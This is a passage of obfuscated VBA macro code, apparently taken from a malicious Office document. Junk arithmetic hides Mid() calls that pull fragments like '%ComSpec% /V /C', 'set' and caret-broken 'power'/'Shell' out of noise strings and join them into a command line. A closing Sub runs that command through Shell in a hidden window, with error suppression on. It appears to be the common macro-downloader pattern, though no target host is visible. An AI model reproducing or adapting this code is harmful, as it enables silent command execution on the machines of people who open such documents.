jPuJzDXCv = qICPlGMNHZZN - EUHZwNNYKhPZVc / (5289144 + TjIlRsOzwqR - 6266240 + ivrKaVHqBauXK)
JCbKKFjcuL = bnpPilinsQb - LGKaGvjiclXP / (9087608 + TnSFOOHM - 7465636 + IanvKuDb)
CaTjG = sJBjaUzqfDpP - UXRvVmBMazT / (178824 + fHlUiiwjD - 9560406 + HslOYcIwt)
FLzcNPhmGm = QXaZcwaXIk + Mid(("djkU%=^wzvwWl7ipvj"), 3, 5)
rDoVMmovo = prELVHTu - ZwncBnowr / (4349937 + kZqHEJRX - 1971980 + olbkwXTQnpan)
YXkFsrGw = rfbvPmhTSLYXQ - zGLpvkj / (7169490 + MsFPUhDhj - 9352904 + zbdNClcSVaDM)
wQpTqiXcuG = WWKbziDIGSP - KWNlOdr / (5231632 + BWcwnKHOPnI - 6071741 + twXchBtbtJ)
sfcBniFd = GQiPYQZWRJhf + Mid(("wwIp%=p^o^w^erILOWaCEO5z"), 5, 10)
PTMPvqnF = UAhcLUv - qiGYkcPOmwphDI / (2487080 + ovvshIrwu - 4785014 + zpzVhwhDiH)
zTjBhKJZH = HmASUAWDwMnS - QZCMhnKdLDRYm / (5016108 + jWEiHCoI - 8578464 + oqaqcMKXK)
rUJItQGfz = IvUVqzH - iitiaNUaHEKmbQ / (1956343 + twjnjrGAbUAoBj - 8491993 + usaJVFQM)
YOWtJQtu = JsPPjGwLl + Mid(("cEk2O0ZEBIb8qmpdBtTsh^ell&&!%P5dkp3EvdtqlIKuwj3wC"), 20, 10)
aBPijwfNVjw = NULrcsGFNfZYMz - iqAbnfWRinAnD / (8170352 + DdHwwahi - 6496206 + zLwqcftNjuB)
wFrHkThJwA = voNqCdDbFDPF - vQOCRBHSzoU / (4608029 + FHHaWvGShSk - 1148984 + EfGXwvsOjO)
IVPTfiC = KOtuSwAtTcX - UihTzJNwdwuzcM / (5295273 + ZiMZsbQHCMAlS - 8314687 + ujimsOctFTQB)
LoYrzBtbtq = BEFMYdrlXc + Mid(("IB0Omset %UOpXb5BmZ0"), 6, 7)
wiYoHJcfXL = EsOZRmJcfmJAQt - idwlGFbaDn / (1189211 + uPKXwiiiuipKHw - 8280001 + PDTfYjmfXCJs)
AkXoVhr = SKmLsOMUPLV - PfDnmdKOpLzT / (5110262 + NdfzvUqBcU - 654207 + PhiQzswzIAjrkY)
nDFEWL = dmHKSkVAjpPPAr - DjkmOdkZL / (1468003 + cNNtoOWWMP - 4038190 + kOtjvbkd)
nhZkuoa = UwRGVIUoQ + Mid(("VqadfGHUamWvqIlV4hEE3NVtWEk4iuccc5"), 4, 7)
scRLNEXuWX = npBAsiiw - azYVzozbiXWS / (3175231 + jQMBTBZFnGltFa - 6843444 + TbzOZHZoXEPU)
qRjJvuESsuY = ZlpWvUjfdL - JULRkEjXrtEuVC / (3968285 + rYdOlEhOUw - 4247737 + FzFpPAEE)
fZAStuTw = HETVsdiUrTUavs - zzKFnwwn / (6557966 + RroOiUzPcj - 3861310 + stbCudcB)
aJJjcqG = GvwzHzKUtNvDzI + Mid(("KkZWCTDzuj0zmadUUOzcdBSdOL3u"), 5, 5)
kjCcNZViLJj = blqFMzWLSImpEQ - lCSLjoGjpYM / (5767510 + wdYDYvSpLoRciY - 8572842 + LBNZVjwsFEHUBA)
XwftCjN = zVYMokjRIwoZ - BiBQNldXz / (814633 + ShjwTnwnKHS - 1407309 + LDNckEb)
biCGlt = GiqWCrGQXJAR - uHElzVABPGjbwE / (1938274 + BnucvLwpbQ - 9281100 + XnzSqJQwJrmjb)
EdOXMGjsPi = KHwqSqzRzLQl + Mid(("zZk LBpLmvEkU%! pWULWN3pzwjL8BmOQzv2lz23pa"), 12, 5)
TSSisaERoH = BjIPJjYIibJQl - nNOJALBOUXhj / (1880763 + viRbMBHh - 7608590 + iFKSCPSqJTzii)
iScQFopXkc = VtmmOlic - PNzKhEjfGa / (4022781 + vBjMFEqXpJM - 9904755 + FTOVTBK)
jVnkX = iuECEkm - otIJlasDZI / (6341450 + EhFBAFclVJmYJ - 3962979 + GiKATDzB)
UUCiw = rbHuGnwsWWF + Mid(("mjaEwZcUOCTDzu%!!%cdtP"), 8, 11)
RBVojFKfjrU = LoYrzBtbtq + aJJjcqG + sfcBniFd + ndmqHWR + SPZftYaZ + FLzcNPhmGm + YOWtJQtu + UUCiw + nhZkuoa + EdOXMGjsPi
QDpTiaKvK = SBBpDBzIBE - GkzROmZPINo / (1473389 + pzKmzKKOcDr - 3699193 + RaIALBsW)
KTqCQoljB = dtVzGrNK - uQdhIzDVzGHBn / (2939267 + idUjjWYh - 5190241 + NZpRTRnAKzFjmh)
EMTmauGqi = VcWddUVi - luYODfo / (3876621 + cREzqmf - 3869370 + mHjoXvd)
End Function

Attribute VB_Name = "MzRPtsOY"
Function OTPmrJAVNqRJGc()
On Error Resume Next
msikSwzlZ = iiAnnUh - wCqfFwFu / (2608626 + tVJICzidRm - 7339566 + uswWAJawCXrQ)
ajBZS = nXHGwwGkqbauVj - JKCvWMI / (9569137 + jwwURSWdtOOb - 4431236 + TpfBDRXbfc)
RFmrYMkUrzX = msVwuhfZaW - AmTXFzB / (1305392 + ZmmiFqKEj - 1855940 + RTviaBhz)
JMwQFkw = mLvBBwLVw + Mid(("ZsdwqBLCSYFSwOORQ    %C^om^S^p^Ec%  FGIQBPHv"), 18, 19)
abczozulLcO = KzAFmqDXat - PljqozDPB / (4920723 + XplRQzcYUjjs - 1817608 + iUPrvKIIjljICt)
iKnCOZ = ILYwbcKUVZGv - YhisXvK / (5632727 + XGPaOIzlIuiqM - 4660389 + uiTTzuSp)
Otvpq = FkzCokHjF - nSjANCUjQM / (2466526 + MIbzpbqd - 8914004 + QAViJwz)
jrHEn = jBzARptifMaa + Mid(("YnQfsUucFGizCWadiqw  ohd   ioqwhd   iotDWfLkiwGlhpaGJJsbZO"), 17, 22)
zhchqmVLf = KBdCtXqbqvj - bZhBifjsYmsZO / (5221341 + YmmHVYwkEn - 9707906 + GSVHcGEJSCm)
cawLwztvJHk = CWYGXIDnSDS - DoKUcpdOjDcaD / (6098059 + SJRBVzKEz - 13565 + MvjKJDzfDnwkh)
jnXVsqwlTw = ZYszuwDrrki - BzptkLU / (7000948 + hiZuZbXbcWZ - 7001099 + vbRFEBoVEw)
CWfpTisiXuz = mwlskoLiFR + Mid(("juVMljqusfbqwhjiDwjGpqNMjJuUGCiCl"), 12, 3)
EDzrLsbBC = EVXjPOOFQc - ObfGSvH / (5680343 + smXZhRZmJnY - 847953 + zAjiIFpkbrYz)
wrkwTV = jYizAsNOaSz - wwpcvcEzhdiXnn / (398324 + vQuzZFhAHMmfq - 3636255 + hmjJGzIfPU)
ONRDqtwuF = tFtGJNq - TJXzYtQoUj / (8062015 + GOGwkGdvom - 7134277 + fWLcHACZpQz)
zmiffCdctSc = IBBqKDkPwArt + Mid(("ZAgeui   qwgeiqweqwe BlKcRIHadJGGEUji"), 3, 19)
uNSzzFIDKcK = vfwwWCjvljYsSB - ohTjQjqOtmvw / (2627905 + dwoGjbj - 5639186 + iAptfToR)
WPmjbNA = GiBdVPIMFQ - KaEWpHi / (6933282 + iaALXojbpKvF - 4114485 + riEAdZzXVP)
oNSQdMXmtTM = ADwTEYkEfo - hpFjihWuUAo / (405285 + rkGFKoKF - 7140295 + XlkHlmLBqkLwP)
jQEzbWIb = JoIQpKowZ + Mid(("fzlwqplcmd     hhwjYnOSzzDs"), 8, 12)
fWXiDp = qiawCivwZlIJw - SAuVLIUXJiqPLj / (59354 + RUjHzGlAMMB - 8378182 + PRlZMjjizFWZT)
RsXWXELMiJ = vGmWLwuTnd - wMPtJzGcjtMEq / (9820371 + QzUPJijlptZpqt - 9326923 + iIiNXUooGPwmaj)
iLwhNAf = wXLhzwY - ISaZAjJQj / (6991383 + ivIlcwJfJumuLG - 8296581 + SiLzzFpZvzu)
DRzADwp = wqQBavXLBjcTRf + Mid(("iIiwuHGOsOwpEBPILuRSsVszEBORF        /V         /ClvqRt"), 30, 20)
LIrXP = PZVYPTJFq - YlzcGipfBVaM / (9093230 + shFkpjuaLiq - 3146203 + XhbizFM)
YHUOb = QdXAFwDjSsCdv - hNYPKrwaVmp / (5865756 + zZqaHilbE - 6503417 + kjrqslnmIrAO)
mjXWURGJ = kvUqqIl - aiGJcSvu / (1882121 + dfpfaAH - 6528347 + wDWazLlqMOvl)
wYWVtmFz = FwwMBdAGnmjlo + Mid(("sGjnjjshDfido  &   niUwqrwvci"), 11, 9)
chirllvaz = EUUiIYmHE - IwqcjjO / (3551668 + jPVVPbRRGLXm - 5028856 + UlrtNcXJREC)
FTmuKj = iZqILkVqwAi - EHqHfvhQiUWqrm / (171828 + JZzRSnssawAmR - 6920742 + TCspFlQdWXl)
spMoJjWJJ = NCzQYjfjZCRjQ - zjhvuzwqC / (7690765 + zuEtwbthufpahc - 580187 + DFQkMYrnjwac)
SjzfBBuYmjI = wZJFkjPSsrwoXi + Mid(("rNakquui   qwUalJHNUWzwurcraD"), 5, 9)
TzzKcZ = WjIGzTrOvllDmY - QJzBRvz / (1450453 + OQBOJPbpMNBIf - 5565505 + HkXzmPIiClLdda)
LJmnsCBBIc = DXbSrjRd - fJvqZXv / (6995445 + DtjYzVaFmzcw - 7322813 + PGKdjNlNpHTTdT)
ELwriz = EipawZjaf - GslwSAFtKj / (6961075 + tPXvqDZFj - 8418188 + nhUnXpYi)
PmfdCqO = uXALRaobndbY + Mid(("zfc           aOzXsDotzzcCOiaaGrGMRzhSNDFCRuln"), 3, 12)
OTPmrJAVNqRJGc = jQEzbWIb + SjzfBBuYmjI + zmiffCdctSc + jrHEn + CWfpTisiXuz + wYWVtmFz + JMwQFkw + DRzADwp + PmfdCqO
fiGZUzQWG = aSniolaDB - cBarPlwOwNhE / (7262743 + EknpCvZhSrFZTE - 8645484 + MUopFiEOKjBC)
YtfVjqdEz = BFJvjilpStVO - NPwrajZ / (5994941 + uXIYMjsdb - 7849353 + bSjjKvWcUQIj)
JsRGkzDYY = iKlnKWB - pSjdavjPhfJwKC / (7398344 + zjudHiXQNVkYu - 4413658 + AaXbqzjRWZVS)
End Function
Sub wrTPYEmLACm(EAAjHZChQv As String)
On Error Resume Next
LkMtzcBEs = lrFcwFXLU - IPnYaqnaCFm / (450747 + wPDrOiztjYpjj - 8982190 + lJUIwCiwz)
oSIoaBnfi = JMsNJjW - crwouwXpskiF / (7654742 + TGDvVJTil - 1846493 + ilDswKc)
Shell EAAjHZChQv, 0
aQGFwzYMR = ICBdNvtmKOKM - zFonPKUzw / (5012134 + iXHOHDX - 1728457 + jViIXRpJGlwRN)
wIzJMICzn = czzqofiH - BUibWjQwUKqLd / (6916837 + YwOzrOGuv - 1903209 + JYaBiciE)
End Sub